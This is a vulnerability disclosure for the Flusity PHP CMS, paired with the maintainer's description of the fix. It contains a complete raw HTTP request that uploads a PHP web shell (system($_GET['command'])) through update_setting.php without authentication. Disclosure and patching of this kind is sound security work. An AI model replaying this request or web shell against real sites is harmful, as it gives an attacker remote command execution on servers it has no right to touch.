Unauthen Unrestricted Upload of File with Dangerous Type in update_setting.php

[BaciHanma]

After installation, log in to the backend using default account password tester/1234 Select core settings -> Settings Select upload file Intercept traffic packets, modify filename to a PHP file name suffix, and change the content to PHP code.

POST /core/tools/actions/update_setting.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------179823897913899829053591720907
Content-Length: 1866
Origin: http://localhost
Connection: close
Referer: http://localhost/core/tools/settings.php
Cookie: PHPSESSID=drc2752h4lmmrqc9vvu5qio597
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="site_title"

Free CMS flusity
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="meta_description"

Flusity is a contemporary PHP CMS project utilizing MVC architecture, MySQL database, and Bootstrap front-end framework. It includes the management of users, posts, menu, blocks and other elements, as well as security and SEO featurD
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="default_keywords"

free cms, php, free website, cms, content management system, free cms flusity, php cms, website 
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="footer_text"

Copyright © flusity JD Theme 2023
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="pretty_url"

1
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="registration_enabled"

1
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="posts_per_page"

10
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="language"

en
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="bilingualism"

1
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="session_lifetime"

30
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="brand_icone"; filename="index.php"
Content-Type: image/png

<?php echo system($_GET['command']); ?>
-----------------------------179823897913899829053591720907—

You can upload without authen:

view uploaded files execute php code correctly On line 52 of update_setting.php: It is not enough to filter file_types and file_size, you need to filter file_name and file_extensions

[flusity]

After noticing a security hole in the file upload functionality, I thoroughly reviewed and updated the code to ensure a higher level of system security. Here are the main actions and changes made:

Changes and their purpose: Checking allowed file extensions:

I added an additional check for file extensions in addition to the already existing MIME type check. This ensures that only allowed image file formats (eg .png, .jpeg, .gif) are accepted. This step helps prevent malicious scripts from being loaded by bypassing file type checking. Filename Security Assurance:

I modified the filename generation logic to use only safe characters and a unique code, along with lowercase letters for the file extension. This helps prevent potential attacks that could be performed by manipulating file names. Double Check File Type:

I implemented both MIME type and file extension checking to double check that the uploaded file is indeed of an allowed type. This additional layer of security reduces the risk of restrictions being bypassed during the upload process. Code Optimization and Duplication Removal:

I removed unnecessary code duplication related to file inclusion (require_once) to reduce the chance of errors and improve code maintainability. Security Measures Results: These changes not only prevent malicious files from being uploaded to the system, but also increase the overall resistance of the application against various security threats. The file upload feature now carefully checks and validates each uploaded file, ensuring that only verified and safe files are accepted.

In addition, these updates improve system security by reducing the potential risk of malicious code execution and ensuring that the file upload process is controlled and secure. Thanks for the comments